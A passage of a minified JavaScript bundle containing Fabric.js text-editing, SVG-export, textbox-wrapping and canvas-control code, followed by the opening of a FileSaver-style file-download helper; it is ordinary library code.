g=this.fromStringToGraphemeSelection(this.hiddenTextarea.selectionStart,this.hiddenTextarea.selectionEnd,this.hiddenTextarea.value);this.selectionEnd=this.selectionStart=g.selectionEnd,this.inCompositionMode||(this.selectionStart=g.selectionStart),this.updateTextareaPosition()}},updateTextareaPosition:function(){if(this.selectionStart===this.selectionEnd){var g=this._calcTextareaPosition();this.hiddenTextarea.style.left=g.left,this.hiddenTextarea.style.top=g.top}},_calcTextareaPosition:function(){if(!this.canvas)return{x:1,y:1};var g=this.inCompositionMode?this.compositionStart:this.selectionStart,b=this._getCursorBoundaries(g),_=this.get2DCursorLocation(g),p=this.getValueOfPropertyAt(_.lineIndex,_.charIndex,"fontSize")*this.lineHeight,D=b.leftOffset,w=this.calcTransformMatrix(),x={x:b.left+D,y:b.top+b.topOffset+p},S=this.canvas.getRetinaScaling(),O=this.canvas.upperCanvasEl,U=O.width/S,K=O.height/S,ee=U-p,se=K-p,ve=O.clientWidth/U,le=O.clientHeight/K;return x=j.util.transformPoint(x,w),(x=j.util.transformPoint(x,this.canvas.viewportTransform)).x*=ve,x.y*=le,x.x<0&&(x.x=0),x.x>ee&&(x.x=ee),x.y<0&&(x.y=0),x.y>se&&(x.y=se),x.x+=this.canvas._offset.left,x.y+=this.canvas._offset.top,{left:x.x+"px",top:x.y+"px",fontSize:p+"px",charHeight:p}},_saveEditingProps:function(){this._savedProps={hasControls:this.hasControls,borderColor:this.borderColor,lockMovementX:this.lockMovementX,lockMovementY:this.lockMovementY,hoverCursor:this.hoverCursor,selectable:this.selectable,defaultCursor:this.canvas&&this.canvas.defaultCursor,moveCursor:this.canvas&&this.canvas.moveCursor}},_restoreEditingProps:function(){!this._savedProps||(this.hoverCursor=this._savedProps.hoverCursor,this.hasControls=this._savedProps.hasControls,this.borderColor=this._savedProps.borderColor,this.selectable=this._savedProps.selectable,this.lockMovementX=this._savedProps.lockMovementX,this.lockMovementY=this._savedProps.lockMovementY,this.canvas&&(this.canvas.defaultCursor=this._savedProps.defaultCursor,this.canvas.moveCursor=this._savedProps.moveCursor))},exitEditing:function(){var g=this._textBeforeEdit!==this.text,b=this.hiddenTextarea;return this.selected=!1,this.isEditing=!1,this.selectionEnd=this.selectionStart,b&&(b.blur&&b.blur(),b.parentNode&&b.parentNode.removeChild(b)),this.hiddenTextarea=null,this.abortCursorAnimation(),this._restoreEditingProps(),this._currentCursorOpacity=0,this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this.fire("editing:exited"),g&&this.fire("modified"),this.canvas&&(this.canvas.off("mouse:move",this.mouseMoveHandler),this.canvas.fire("text:editing:exited",{target:this}),g&&this.canvas.fire("object:modified",{target:this})),this},_removeExtraneousStyles:function(){for(var g in this.styles)this._textLines[g]||delete this.styles[g]},removeStyleFromTo:function(g,b){var x,S,_=this.get2DCursorLocation(g,!0),y=this.get2DCursorLocation(b,!0),M=_.lineIndex,p=_.charIndex,D=y.lineIndex,w=y.charIndex;if(M!==D){if(this.styles[M])for(x=p;x<this._unwrappedTextLines[M].length;x++)delete this.styles[M][x];if(this.styles[D])for(x=w;x<this._unwrappedTextLines[D].length;x++)(S=this.styles[D][x])&&(this.styles[M]||(this.styles[M]={}),this.styles[M][p+x-w]=S);for(x=M+1;x<=D;x++)delete this.styles[x];this.shiftLineStyles(D,M-D)}else if(this.styles[M]){S=this.styles[M];var U,K,O=w-p;for(x=p;x<w;x++)delete S[x];for(K in this.styles[M])(U=parseInt(K,10))>=w&&(S[U-O]=S[K],delete S[K])}},shiftLineStyles:function(g,b){var _=E(this.styles);for(var y in this.styles){var M=parseInt(y,10);M>g&&(this.styles[M+b]=_[M],_[M-b]||delete this.styles[M])}},restartCursorIfNeeded:function(){(!this._currentTickState||this._currentTickState.isAborted||!this._currentTickCompleteState||this._currentTickCompleteState.isAborted)&&this.initDelayedCursor()},insertNewlineStyleObject:function(g,b,_,y){var M,p={},D=!1,w=this._unwrappedTextLines[g].length===b;for(var x in _||(_=1),this.shiftLineStyles(g,_),this.styles[g]&&(M=this.styles[g][0===b?b:b-1]),this.styles[g]){var S=parseInt(x,10);S>=b&&(D=!0,p[S-b]=this.styles[g][x],w&&0===b||delete this.styles[g][x])}var O=!1;for(D&&!w&&(this.styles[g+_]=p,O=!0),O&&_--;_>0;)y&&y[_-1]?this.styles[g+_]={0:E(y[_-1])}:M?this.styles[g+_]={0:E(M)}:delete this.styles[g+_],_--;this._forceClearCache=!0},insertCharStyleObject:function(g,b,_,y){this.styles||(this.styles={});var M=this.styles[g],p=M?E(M):{};for(var D in _||(_=1),p){var w=parseInt(D,10);w>=b&&(M[w+_]=p[w],p[w-_]||delete M[w])}if(this._forceClearCache=!0,y)for(;_--;)!Object.keys(y[_]).length||(this.styles[g]||(this.styles[g]={}),this.styles[g][b+_]=E(y[_]));else if(M)for(var x=M[b?b-1:1];x&&_--;)this.styles[g][b+_]=E(x)},insertNewStyleBlock:function(g,b,_){for(var y=this.get2DCursorLocation(b,!0),M=[0],p=0,D=0;D<g.length;D++)"\n"===g[D]?M[++p]=0:M[p]++;for(M[0]>0&&(this.insertCharStyleObject(y.lineIndex,y.charIndex,M[0],_),_=_&&_.slice(M[0]+1)),p&&this.insertNewlineStyleObject(y.lineIndex,y.charIndex+M[0],p),D=1;D<p;D++)M[D]>0?this.insertCharStyleObject(y.lineIndex+D,0,M[D],_):_&&this.styles[y.lineIndex+D]&&_[0]&&(this.styles[y.lineIndex+D][0]=_[0]),_=_&&_.slice(M[D]+1);M[D]>0&&this.insertCharStyleObject(y.lineIndex+D,0,M[D],_)},setSelectionStartEndWithShift:function(g,b,_){_<=g?(b===g?this._selectionDirection="left":"right"===this._selectionDirection&&(this._selectionDirection="left",this.selectionEnd=g),this.selectionStart=_):_>g&&_<b?"right"===this._selectionDirection?this.selectionEnd=_:this.selectionStart=_:(b===g?this._selectionDirection="right":"left"===this._selectionDirection&&(this._selectionDirection="right",this.selectionStart=b),this.selectionEnd=_)},setSelectionInBoundaries:function(){var g=this.text.length;this.selectionStart>g?this.selectionStart=g:this.selectionStart<0&&(this.selectionStart=0),this.selectionEnd>g?this.selectionEnd=g:this.selectionEnd<0&&(this.selectionEnd=0)}})}(),j.util.object.extend(j.IText.prototype,{initDoubleClickSimulation:function(){this.__lastClickTime=+new Date,this.__lastLastClickTime=+new Date,this.__lastPointer={},this.on("mousedown",this.onMouseDown)},onMouseDown:function(E){if(this.canvas){this.__newClickTime=+new Date;var g=E.pointer;this.isTripleClick(g)&&(this.fire("tripleclick",E),this._stopEvent(E.e)),this.__lastLastClickTime=this.__lastClickTime,this.__lastClickTime=this.__newClickTime,this.__lastPointer=g,this.__lastIsEditing=this.isEditing,this.__lastSelected=this.selected}},isTripleClick:function(E){return this.__newClickTime-this.__lastClickTime<500&&this.__lastClickTime-this.__lastLastClickTime<500&&this.__lastPointer.x===E.x&&this.__lastPointer.y===E.y},_stopEvent:function(E){E.preventDefault&&E.preventDefault(),E.stopPropagation&&E.stopPropagation()},initCursorSelectionHandlers:function(){this.initMousedownHandler(),this.initMouseupHandler(),this.initClicks()},doubleClickHandler:function(E){!this.isEditing||this.selectWord(this.getSelectionStartFromPointer(E.e))},tripleClickHandler:function(E){!this.isEditing||this.selectLine(this.getSelectionStartFromPointer(E.e))},initClicks:function(){this.on("mousedblclick",this.doubleClickHandler),this.on("tripleclick",this.tripleClickHandler)},_mouseDownHandler:function(E){!this.canvas||!this.editable||E.e.button&&1!==E.e.button||(this.__isMousedown=!0,this.selected&&(this.inCompositionMode=!1,this.setCursorByClick(E.e)),this.isEditing&&(this.__selectionStartOnMouseDown=this.selectionStart,this.selectionStart===this.selectionEnd&&this.abortCursorAnimation(),this.renderCursorOrSelection()))},_mouseDownHandlerBefore:function(E){!this.canvas||!this.editable||E.e.button&&1!==E.e.button||(this.selected=this===this.canvas._activeObject)},initMousedownHandler:function(){this.on("mousedown",this._mouseDownHandler),this.on("mousedown:before",this._mouseDownHandlerBefore)},initMouseupHandler:function(){this.on("mouseup",this.mouseUpHandler)},mouseUpHandler:function(E){if(this.__isMousedown=!1,!(!this.editable||this.group||E.transform&&E.transform.actionPerformed||E.e.button&&1!==E.e.button)){if(this.canvas){var g=this.canvas._activeObject;if(g&&g!==this)return}this.__lastSelected&&!this.__corner?(this.selected=!1,this.__lastSelected=!1,this.enterEditing(E.e),this.selectionStart===this.selectionEnd?this.initDelayedCursor(!0):this.renderCursorOrSelection()):this.selected=!0}},setCursorByClick:function(E){var g=this.getSelectionStartFromPointer(E);E.shiftKey?this.setSelectionStartEndWithShift(this.selectionStart,this.selectionEnd,g):(this.selectionStart=g,this.selectionEnd=g),this.isEditing&&(this._fireSelectionChanged(),this._updateTextarea())},getSelectionStartFromPointer:function(E){for(var w,g=this.getLocalPointer(E),b=0,_=0,y=0,M=0,p=0,x=0,S=this._textLines.length;x<S&&y<=g.y;x++)y+=this.getHeightOfLine(x)*this.scaleY,p=x,x>0&&(M+=this._textLines[x-1].length+this.missingNewlineOffset(x-1));_=this._getLineLeftOffset(p)*this.scaleX,w=this._textLines[p],"rtl"===this.direction&&(g.x=this.width*this.scaleX-g.x+_);for(var O=0,U=w.length;O<U&&(b=_,(_+=this.__charBounds[p][O].kernedWidth*this.scaleX)<=g.x);O++)M++;return this._getNewSelectionStartFromOffset(g,b,_,M,U)},_getNewSelectionStartFromOffset:function(E,g,b,_,y){var p=b-E.x,w=_+(p>E.x-g||p<0?0:1);return this.flipX&&(w=y-w),w>this._text.length&&(w=this._text.length),w}}),j.util.object.extend(j.IText.prototype,{initHiddenTextarea:function(){this.hiddenTextarea=j.document.createElement("textarea"),this.hiddenTextarea.setAttribute("autocapitalize","off"),this.hiddenTextarea.setAttribute("autocorrect","off"),this.hiddenTextarea.setAttribute("autocomplete","off"),this.hiddenTextarea.setAttribute("spellcheck","false"),this.hiddenTextarea.setAttribute("data-fabric-hiddentextarea",""),this.hiddenTextarea.setAttribute("wrap","off");var E=this._calcTextareaPosition();this.hiddenTextarea.style.cssText="position: absolute; top: "+E.top+"; left: "+E.left+"; z-index: -999; opacity: 0; width: 1px; height: 1px; font-size: 1px; padding\uff70top: "+E.fontSize+";",this.hiddenTextareaContainer?this.hiddenTextareaContainer.appendChild(this.hiddenTextarea):j.document.body.appendChild(this.hiddenTextarea),j.util.addListener(this.hiddenTextarea,"keydown",this.onKeyDown.bind(this)),j.util.addListener(this.hiddenTextarea,"keyup",this.onKeyUp.bind(this)),j.util.addListener(this.hiddenTextarea,"input",this.onInput.bind(this)),j.util.addListener(this.hiddenTextarea,"copy",this.copy.bind(this)),j.util.addListener(this.hiddenTextarea,"cut",this.copy.bind(this)),j.util.addListener(this.hiddenTextarea,"paste",this.paste.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionstart",this.onCompositionStart.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionupdate",this.onCompositionUpdate.bind(this)),j.util.addListener(this.hiddenTextarea,"compositionend",this.onCompositionEnd.bind(this)),!this._clickHandlerInitialized&&this.canvas&&(j.util.addListener(this.canvas.upperCanvasEl,"click",this.onClick.bind(this)),this._clickHandlerInitialized=!0)},keysMap:{9:"exitEditing",27:"exitEditing",33:"moveCursorUp",34:"moveCursorDown",35:"moveCursorRight",36:"moveCursorLeft",37:"moveCursorLeft",38:"moveCursorUp",39:"moveCursorRight",40:"moveCursorDown"},keysMapRtl:{9:"exitEditing",27:"exitEditing",33:"moveCursorUp",34:"moveCursorDown",35:"moveCursorLeft",36:"moveCursorRight",37:"moveCursorRight",38:"moveCursorUp",39:"moveCursorLeft",40:"moveCursorDown"},ctrlKeysMapUp:{67:"copy",88:"cut"},ctrlKeysMapDown:{65:"selectAll"},onClick:function(){this.hiddenTextarea&&this.hiddenTextarea.focus()},onKeyDown:function(E){if(this.isEditing){var g="rtl"===this.direction?this.keysMapRtl:this.keysMap;if(E.keyCode in g)this[g[E.keyCode]](E);else{if(!(E.keyCode in this.ctrlKeysMapDown)||!E.ctrlKey&&!E.metaKey)return;this[this.ctrlKeysMapDown[E.keyCode]](E)}E.stopImmediatePropagation(),E.preventDefault(),E.keyCode>=33&&E.keyCode<=40?(this.inCompositionMode=!1,this.clearContextTop(),this.renderCursorOrSelection()):this.canvas&&this.canvas.requestRenderAll()}},onKeyUp:function(E){!this.isEditing||this._copyDone||this.inCompositionMode?this._copyDone=!1:E.keyCode in this.ctrlKeysMapUp&&(E.ctrlKey||E.metaKey)&&(this[this.ctrlKeysMapUp[E.keyCode]](E),E.stopImmediatePropagation(),E.preventDefault(),this.canvas&&this.canvas.requestRenderAll())},onInput:function(E){var g=this.fromPaste;if(this.fromPaste=!1,E&&E.stopPropagation(),this.isEditing){var M,p,O,U,K,b=this._splitTextIntoLines(this.hiddenTextarea.value).graphemeText,_=this._text.length,y=b.length,D=y-_,w=this.selectionStart,x=this.selectionEnd,S=w!==x;if(""===this.hiddenTextarea.value)return this.styles={},this.updateFromTextArea(),this.fire("changed"),void(this.canvas&&(this.canvas.fire("text:changed",{target:this}),this.canvas.requestRenderAll()));var ee=this.fromStringToGraphemeSelection(this.hiddenTextarea.selectionStart,this.hiddenTextarea.selectionEnd,this.hiddenTextarea.value),se=w>ee.selectionStart;S?(M=this._text.slice(w,x),D+=x-w):y<_&&(M=se?this._text.slice(x+D,x):this._text.slice(w,w-D)),p=b.slice(ee.selectionEnd-D,ee.selectionEnd),M&&M.length&&(p.length&&(O=this.getSelectionStyles(w,w+1,!1),O=p.map(function(){return O[0]})),S?(U=w,K=x):se?(U=x-M.length,K=x):(U=x,K=x+M.length),this.removeStyleFromTo(U,K)),p.length&&(g&&p.join("")===j.copiedText&&!j.disableStyleCopyPaste&&(O=j.copiedTextStyle),this.insertNewStyleBlock(p,w,O)),this.updateFromTextArea(),this.fire("changed"),this.canvas&&(this.canvas.fire("text:changed",{target:this}),this.canvas.requestRenderAll())}},onCompositionStart:function(){this.inCompositionMode=!0},onCompositionEnd:function(){this.inCompositionMode=!1},onCompositionUpdate:function(E){this.compositionStart=E.target.selectionStart,this.compositionEnd=E.target.selectionEnd,this.updateTextareaPosition()},copy:function(){this.selectionStart!==this.selectionEnd&&(j.copiedText=this.getSelectedText(),j.copiedTextStyle=j.disableStyleCopyPaste?null:this.getSelectionStyles(this.selectionStart,this.selectionEnd,!0),this._copyDone=!0)},paste:function(){this.fromPaste=!0},_getClipboardData:function(E){return E&&E.clipboardData||j.window.clipboardData},_getWidthBeforeCursor:function(E,g){var _,b=this._getLineLeftOffset(E);return g>0&&(b+=(_=this.__charBounds[E][g-1]).left+_.width),b},getDownCursorOffset:function(E,g){var b=this._getSelectionForOffset(E,g),_=this.get2DCursorLocation(b),y=_.lineIndex;if(y===this._textLines.length-1||E.metaKey||34===E.keyCode)return this._text.length-b;var M=_.charIndex,p=this._getWidthBeforeCursor(y,M),D=this._getIndexOnLine(y+1,p);return this._textLines[y].slice(M).length+D+1+this.missingNewlineOffset(y)},_getSelectionForOffset:function(E,g){return E.shiftKey&&this.selectionStart!==this.selectionEnd&&g?this.selectionEnd:this.selectionStart},getUpCursorOffset:function(E,g){var b=this._getSelectionForOffset(E,g),_=this.get2DCursorLocation(b),y=_.lineIndex;if(0===y||E.metaKey||33===E.keyCode)return-b;var M=_.charIndex,p=this._getWidthBeforeCursor(y,M),D=this._getIndexOnLine(y-1,p),w=this._textLines[y].slice(0,M),x=this.missingNewlineOffset(y-1);return-this._textLines[y-1].length+D-w.length+(1-x)},_getIndexOnLine:function(E,g){for(var p,D,b=this._textLines[E],y=this._getLineLeftOffset(E),M=0,w=0,x=b.length;w<x;w++)if((y+=p=this.__charBounds[E][w].width)>g){D=!0;var O=y,U=Math.abs(y-p-g);M=Math.abs(O-g)<U?w:w-1;break}return D||(M=b.length-1),M},moveCursorDown:function(E){this.selectionStart>=this._text.length&&this.selectionEnd>=this._text.length||this._moveCursorUpOrDown("Down",E)},moveCursorUp:function(E){0===this.selectionStart&&0===this.selectionEnd||this._moveCursorUpOrDown("Up",E)},_moveCursorUpOrDown:function(E,g){var _=this["get"+E+"CursorOffset"](g,"right"===this._selectionDirection);g.shiftKey?this.moveCursorWithShift(_):this.moveCursorWithoutShift(_),0!==_&&(this.setSelectionInBoundaries(),this.abortCursorAnimation(),this._currentCursorOpacity=1,this.initDelayedCursor(),this._fireSelectionChanged(),this._updateTextarea())},moveCursorWithShift:function(E){return this.setSelectionStartEndWithShift(this.selectionStart,this.selectionEnd,"left"===this._selectionDirection?this.selectionStart+E:this.selectionEnd+E),0!==E},moveCursorWithoutShift:function(E){return E<0?(this.selectionStart+=E,this.selectionEnd=this.selectionStart):(this.selectionEnd+=E,this.selectionStart=this.selectionEnd),0!==E},moveCursorLeft:function(E){0===this.selectionStart&&0===this.selectionEnd||this._moveCursorLeftOrRight("Left",E)},_move:function(E,g,b){var _;if(E.altKey)_=this["findWordBoundary"+b](this[g]);else{if(!E.metaKey&&35!==E.keyCode&&36!==E.keyCode)return this[g]+="Left"===b?-1:1,!0;_=this["findLineBoundary"+b](this[g])}if(void 0!==_&&this[g]!==_)return this[g]=_,!0},_moveLeft:function(E,g){return this._move(E,g,"Left")},_moveRight:function(E,g){return this._move(E,g,"Right")},moveCursorLeftWithoutShift:function(E){var g=!0;return this._selectionDirection="left",this.selectionEnd===this.selectionStart&&0!==this.selectionStart&&(g=this._moveLeft(E,"selectionStart")),this.selectionEnd=this.selectionStart,g},moveCursorLeftWithShift:function(E){return"right"===this._selectionDirection&&this.selectionStart!==this.selectionEnd?this._moveLeft(E,"selectionEnd"):0!==this.selectionStart?(this._selectionDirection="left",this._moveLeft(E,"selectionStart")):void 0},moveCursorRight:function(E){this.selectionStart>=this._text.length&&this.selectionEnd>=this._text.length||this._moveCursorLeftOrRight("Right",E)},_moveCursorLeftOrRight:function(E,g){var b="moveCursor"+E+"With";this._currentCursorOpacity=1,this[b+=g.shiftKey?"Shift":"outShift"](g)&&(this.abortCursorAnimation(),this.initDelayedCursor(),this._fireSelectionChanged(),this._updateTextarea())},moveCursorRightWithShift:function(E){return"left"===this._selectionDirection&&this.selectionStart!==this.selectionEnd?this._moveRight(E,"selectionStart"):this.selectionEnd!==this._text.length?(this._selectionDirection="right",this._moveRight(E,"selectionEnd")):void 0},moveCursorRightWithoutShift:function(E){var g=!0;return this._selectionDirection="right",this.selectionStart===this.selectionEnd?(g=this._moveRight(E,"selectionStart"),this.selectionEnd=this.selectionStart):this.selectionStart=this.selectionEnd,g},removeChars:function(E,g){void 0===g&&(g=E+1),this.removeStyleFromTo(E,g),this._text.splice(E,g-E),this.text=this._text.join(""),this.set("dirty",!0),this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this._removeExtraneousStyles()},insertChars:function(E,g,b,_){void 0===_&&(_=b),_>b&&this.removeStyleFromTo(b,_);var y=j.util.string.graphemeSplit(E);this.insertNewStyleBlock(y,b,g),this._text=[].concat(this._text.slice(0,b),y,this._text.slice(_)),this.text=this._text.join(""),this.set("dirty",!0),this._shouldClearDimensionCache()&&(this.initDimensions(),this.setCoords()),this._removeExtraneousStyles()}}),function(){var E=j.util.toFixed,g=/  +/g;j.util.object.extend(j.Text.prototype,{_toSVG:function(){var b=this._getSVGLeftTopOffsets(),_=this._getSVGTextAndBg(b.textTop,b.textLeft);return this._wrapSVGTextAndBg(_)},toSVG:function(b){return this._createBaseSVGMarkup(this._toSVG(),{reviver:b,noStyle:!0,withShadow:!0})},_getSVGLeftTopOffsets:function(){return{textLeft:-this.width/2,textTop:-this.height/2,lineTop:this.getHeightOfLine(0)}},_wrapSVGTextAndBg:function(b){var y=this.getSvgTextDecoration(this);return[b.textBgRects.join(""),'\t\t<text xml:space="preserve" ',this.fontFamily?'font-family="'+this.fontFamily.replace(/"/g,"'")+'" ':"",this.fontSize?'font-size="'+this.fontSize+'" ':"",this.fontStyle?'font-style="'+this.fontStyle+'" ':"",this.fontWeight?'font-weight="'+this.fontWeight+'" ':"",y?'text-decoration="'+y+'" ':"",'style="',this.getSvgStyles(!0),'"',this.addPaintOrder()," >",b.textSpans.join(""),"</text>\n"]},_getSVGTextAndBg:function(b,_){var D,y=[],M=[],p=b;this._setSVGBg(M);for(var w=0,x=this._textLines.length;w<x;w++)D=this._getLineLeftOffset(w),(this.textBackgroundColor||this.styleHas("textBackgroundColor",w))&&this._setSVGTextLineBg(M,w,_+D,p),this._setSVGTextLineText(y,w,_+D,p),p+=this.getHeightOfLine(w);return{textSpans:y,textBgRects:M}},_createTextCharSpan:function(b,_,y,M){var p=b!==b.trim()||b.match(g),D=this.getSvgSpanStyles(_,p),w=D?'style="'+D+'"':"",x=_.deltaY,S="",O=j.Object.NUM_FRACTION_DIGITS;return x&&(S=' dy="'+E(x,O)+'" '),['<tspan x="',E(y,O),'" y="',E(M,O),'" ',S,w,">",j.util.string.escapeXml(b),"</tspan>"].join("")},_setSVGTextLineText:function(b,_,y,M){var w,x,O,U,se,p=this.getHeightOfLine(_),D=-1!==this.textAlign.indexOf("justify"),S="",K=0,ee=this._textLines[_];M+=p*(1-this._fontSizeFraction)/this.lineHeight;for(var ve=0,le=ee.length-1;ve<=le;ve++)se=ve===le||this.charSpacing,S+=ee[ve],O=this.__charBounds[_][ve],0===K?(y+=O.kernedWidth-O.width,K+=O.width):K+=O.kernedWidth,D&&!se&&this._reSpaceAndTab.test(ee[ve])&&(se=!0),se||(w=w||this.getCompleteStyleDeclaration(_,ve),x=this.getCompleteStyleDeclaration(_,ve+1),se=j.util.hasStyleChanged(w,x,!0)),se&&(U=this._getStyleDeclaration(_,ve)||{},b.push(this._createTextCharSpan(S,U,y,M)),S="",w=x,y+=K,K=0)},_pushTextBgRect:function(b,_,y,M,p,D){var w=j.Object.NUM_FRACTION_DIGITS;b.push("\t\t<rect ",this._getFillAttributes(_),' x="',E(y,w),'" y="',E(M,w),'" width="',E(p,w),'" height="',E(D,w),'"></rect>\n')},_setSVGTextLineBg:function(b,_,y,M){for(var S,O,p=this._textLines[_],D=this.getHeightOfLine(_)/this.lineHeight,w=0,x=0,U=this.getValueOfPropertyAt(_,0,"textBackgroundColor"),K=0,ee=p.length;K<ee;K++)S=this.__charBounds[_][K],(O=this.getValueOfPropertyAt(_,K,"textBackgroundColor"))!==U?(U&&this._pushTextBgRect(b,U,y+x,M,w,D),x=S.left,w=S.width,U=O):w+=S.kernedWidth;O&&this._pushTextBgRect(b,O,y+x,M,w,D)},_getFillAttributes:function(b){var _=b&&"string"==typeof b?new j.Color(b):"";return _&&_.getSource()&&1!==_.getAlpha()?'opacity="'+_.getAlpha()+'" fill="'+_.setAlpha(1).toRgb()+'"':'fill="'+b+'"'},_getSVGLineTopOffset:function(b){for(var y,_=0,M=0;M<b;M++)_+=this.getHeightOfLine(M);return y=this.getHeightOfLine(M),{lineTop:_,offset:(this._fontSizeMult-this._fontSizeFraction)*y/(this.lineHeight*this._fontSizeMult)}},getSvgStyles:function(b){return j.Object.prototype.getSvgStyles.call(this,b)+" white-space: pre;"}})}(),function(E){"use strict";var g=E.fabric||(E.fabric={});g.Textbox=g.util.createClass(g.IText,g.Observable,{type:"textbox",minWidth:20,dynamicMinWidth:2,__cachedLines:null,lockScalingFlip:!0,noScaleCache:!1,_dimensionAffectingProps:g.Text.prototype._dimensionAffectingProps.concat("width"),_wordJoiners:/[ \t\r]/,splitByGrapheme:!1,initDimensions:function(){this.__skipDimension||(this.isEditing&&this.initDelayedCursor(),this.clearContextTop(),this._clearCache(),this.dynamicMinWidth=0,this._styleMap=this._generateStyleMap(this._splitText()),this.dynamicMinWidth>this.width&&this._set("width",this.dynamicMinWidth),-1!==this.textAlign.indexOf("justify")&&this.enlargeSpaces(),this.height=this.calcTextHeight(),this.saveState({propertySet:"_dimensionAffectingProps"}))},_generateStyleMap:function(b){for(var _=0,y=0,M=0,p={},D=0;D<b.graphemeLines.length;D++)"\n"===b.graphemeText[M]&&D>0?(y=0,M++,_++):!this.splitByGrapheme&&this._reSpaceAndTab.test(b.graphemeText[M])&&D>0&&(y++,M++),p[D]={line:_,offset:y},M+=b.graphemeLines[D].length,y+=b.graphemeLines[D].length;return p},styleHas:function(b,_){if(this._styleMap&&!this.isWrapping){var y=this._styleMap[_];y&&(_=y.line)}return g.Text.prototype.styleHas.call(this,b,_)},isEmptyStyles:function(b){if(!this.styles)return!0;var M,p,_=0,D=!1,w=this._styleMap[b],x=this._styleMap[b+1];for(var S in w&&(b=w.line,_=w.offset),x&&(D=x.line===b,M=x.offset),p=void 0===b?this.styles:{line:this.styles[b]})for(var O in p[S])if(O>=_&&(!D||O<M))for(var U in p[S][O])return!1;return!0},_getStyleDeclaration:function(b,_){if(this._styleMap&&!this.isWrapping){var y=this._styleMap[b];if(!y)return null;b=y.line,_=y.offset+_}return this.callSuper("_getStyleDeclaration",b,_)},_setStyleDeclaration:function(b,_,y){var M=this._styleMap[b];this.styles[b=M.line][_=M.offset+_]=y},_deleteStyleDeclaration:function(b,_){var y=this._styleMap[b];delete this.styles[b=y.line][_=y.offset+_]},_getLineStyle:function(b){return!!this.styles[this._styleMap[b].line]},_setLineStyle:function(b){this.styles[this._styleMap[b].line]={}},_wrapText:function(b,_){var M,y=[];for(this.isWrapping=!0,M=0;M<b.length;M++)y=y.concat(this._wrapLine(b[M],M,_));return this.isWrapping=!1,y},_measureWord:function(b,_,y){var p,M=0;y=y||0;for(var w=0,x=b.length;w<x;w++)M+=this._getGraphemeBox(b[w],_,w+y,p,!0).kernedWidth,p=b[w];return M},_wrapLine:function(b,_,y,z){var p=0,D=this.splitByGrapheme,w=[],x=[],S=D?g.util.string.graphemeSplit(b):b.split(this._wordJoiners),O="",U=0,K=D?"":" ",ee=0,se=0,ve=0,le=!0,ye=this._getWidthOfCharSpacing();z=z||0,0===S.length&&S.push([]),y-=z;for(var l=0;l<S.length;l++)O=D?S[l]:g.util.string.graphemeSplit(S[l]),ee=this._measureWord(O,_,U),U+=O.length,(p+=se+ee-ye)>y&&!le?(w.push(x),x=[],p=ee,le=!0):p+=ye,!le&&!D&&x.push(K),x=x.concat(O),se=D?0:this._measureWord([K],_,U),U++,le=!1,ee>ve&&(ve=ee);return l&&w.push(x),ve+z>this.dynamicMinWidth&&(this.dynamicMinWidth=ve-ye+z),w},isEndOfWrapping:function(b){return!this._styleMap[b+1]||this._styleMap[b+1].line!==this._styleMap[b].line},missingNewlineOffset:function(b){return this.splitByGrapheme?this.isEndOfWrapping(b)?1:0:1},_splitTextIntoLines:function(b){for(var _=g.Text.prototype._splitTextIntoLines.call(this,b),y=this._wrapText(_.lines,this.width),M=new Array(y.length),p=0;p<y.length;p++)M[p]=y[p].join("");return _.lines=M,_.graphemeLines=y,_},getMinWidth:function(){return Math.max(this.minWidth,this.dynamicMinWidth)},_removeExtraneousStyles:function(){var b={};for(var _ in this._styleMap)this._textLines[_]&&(b[this._styleMap[_].line]=1);for(var _ in this.styles)b[_]||delete this.styles[_]},toObject:function(b){return this.callSuper("toObject",["minWidth","splitByGrapheme"].concat(b))}}),g.Textbox.fromObject=function(b,_){var y=g.util.stylesFromArray(b.styles,b.text),M=Object.assign({},b,{styles:y});return g.Object._fromObject("Textbox",M,_,"text")}}(we),function(){var E=j.controlsUtils,g=E.scaleSkewCursorStyleHandler,b=E.scaleCursorStyleHandler,_=E.scalingEqually,y=E.scalingYOrSkewingX,M=E.scalingXOrSkewingY,p=E.scaleOrSkewActionName,D=j.Object.prototype.controls;if(D.ml=new j.Control({x:-.5,y:0,cursorStyleHandler:g,actionHandler:M,getActionName:p}),D.mr=new j.Control({x:.5,y:0,cursorStyleHandler:g,actionHandler:M,getActionName:p}),D.mb=new j.Control({x:0,y:.5,cursorStyleHandler:g,actionHandler:y,getActionName:p}),D.mt=new j.Control({x:0,y:-.5,cursorStyleHandler:g,actionHandler:y,getActionName:p}),D.tl=new j.Control({x:-.5,y:-.5,cursorStyleHandler:b,actionHandler:_}),D.tr=new j.Control({x:.5,y:-.5,cursorStyleHandler:b,actionHandler:_}),D.bl=new j.Control({x:-.5,y:.5,cursorStyleHandler:b,actionHandler:_}),D.br=new j.Control({x:.5,y:.5,cursorStyleHandler:b,actionHandler:_}),D.mtr=new j.Control({x:0,y:-.5,actionHandler:E.rotationWithSnapping,cursorStyleHandler:E.rotationStyleHandler,offsetY:-40,withConnection:!0,actionName:"rotate"}),j.Textbox){var w=j.Textbox.prototype.controls={};w.mtr=D.mtr,w.tr=D.tr,w.br=D.br,w.tl=D.tl,w.bl=D.bl,w.mt=D.mt,w.mb=D.mb,w.mr=new j.Control({x:.5,y:0,actionHandler:E.changeWidth,cursorStyleHandler:g,actionName:"resizing"}),w.ml=new j.Control({x:-.5,y:0,actionHandler:E.changeWidth,cursorStyleHandler:g,actionName:"resizing"})}}()},2344:function(Pe,we){var j;void 0!==(j=function(){"use strict";function ae(b,_,y){var M=new XMLHttpRequest;M.open("GET",b),M.responseType="blob",M.onload=function(){g(M.response,_,y)},M.onerror=function(){console.error("could not download file")},M.send()}function I(b){var _=new XMLHttpRequest;_.open("HEAD",b,!1);try{_.send()}catch(y){}return 200<=_.status&&299>=_.status}function Q(b){try{b.dispatchEvent(new MouseEvent("click"))}catch(y){var _=document.createEvent("MouseEvents");_.initMouseEvent("click",!0,!0,window,0,0,0,80,20,!1,!1,!1,!1,0,null),b.dispatchEvent(_)}}var F="object"==typeof window&&window.window===window?window:"object"==typeof self&&self.self===self?self:"object"==typeof global&&global.global===global?global:void 0,E=F.navigator&&/Macintosh/.test(navigator.userAgent)&&/AppleWebKit/.test(navigator.userAgent)&&!/Safari/.test(navigator.userAgent),g=F.saveAs||("object"!=typeof window||window!==F?function(){}:"download"in HTMLAnchorElement.prototype&&!E?function(b,_,y){var 